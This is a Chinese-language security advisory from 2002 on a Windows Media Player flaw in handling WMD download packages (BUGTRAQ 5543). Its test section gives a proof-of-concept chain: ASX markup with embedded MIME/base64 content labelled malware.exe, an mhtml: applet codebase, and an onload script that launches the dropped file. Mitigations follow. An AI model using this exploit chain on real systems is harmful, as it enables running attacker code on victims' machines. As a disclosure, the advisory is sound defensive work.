发布日期：2002-08-22
更新日期：2002-08-28

受影响系统：

Microsoft Windows Media Player 6.3
    - Apple MacOS 8.0
    - Apple MacOS 7.0
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
Microsoft Windows Media Player 6.4
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
Microsoft Windows Media Player 7
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
Microsoft Windows Media Player 7.1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
Microsoft Windows Media Player XP
    - Microsoft Windows XP

描述：

---

BUGTRAQ  ID: 5543

Microsoft Windows Media Player是一款多媒体播放程序。

Windows Media Player没有正确验证WMD(*.wmd)文件，远程攻击者可以利用这个漏洞允许恶意代码以用户进程在目标系统上执行。

Windows Media Player在处理*.wmd文件时存在问题，WMD(Windows Media Download)包由Media player进程处理后，会把文件存储到用户端已知位置的Virtual Music目录中(如My Documents\My Music\Virtual Albums\malware)。攻击者可以编辑一个包含恶意.ASX和.ASF文件组成的恶意WMD文件，诱使目标用户下载后，Media Player会处理WMD文件时把.ASX和.ASF文件展开到已知的目录中并执行这些恶意代码。

<*来源：http-equiv@excite.com （http-equiv@excite.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103002169129645&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http-equiv@excite.com （http-equiv@excite.com）提供了如下测试方法：

1、建立如下一个*.asx文件：

<ASX version="3">
<Entry>
<ref HREF="cluster.asf"/>
</Entry></ASX>
MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA


<applet CLASSID="CLSID:55555555-5555"
codebase="mhtml:file:///C:\My Documents\My Music\Virtual
Albums\malware\f ck.asx!file:///malware.exe">

2、建立一个包含如下URL内容的*.asf文件：

url: cluster.html

<body onload=malware()>
<script>
function malware(){
alert("malware");location=("file://C%3A%5CMy%20Documents%5CMy%20Music%
5CVirtual%20Albums%5Cmalware%5Cf ck.asx%20.")
}
  </script>

3、建立包含上面2部分组成的*.wmd文件。

http-equiv@excite.com <http-equiv@malware.com>提供如下演示页面：

http://www.malware.com/malware.php

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 建议关闭ActiveX脚本执行。

* 建议如果可能不下载Media。

* 改变默认的"My Music ..."位置。

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/default.asp

浏览次数：5663
严重程度：0（网友投票）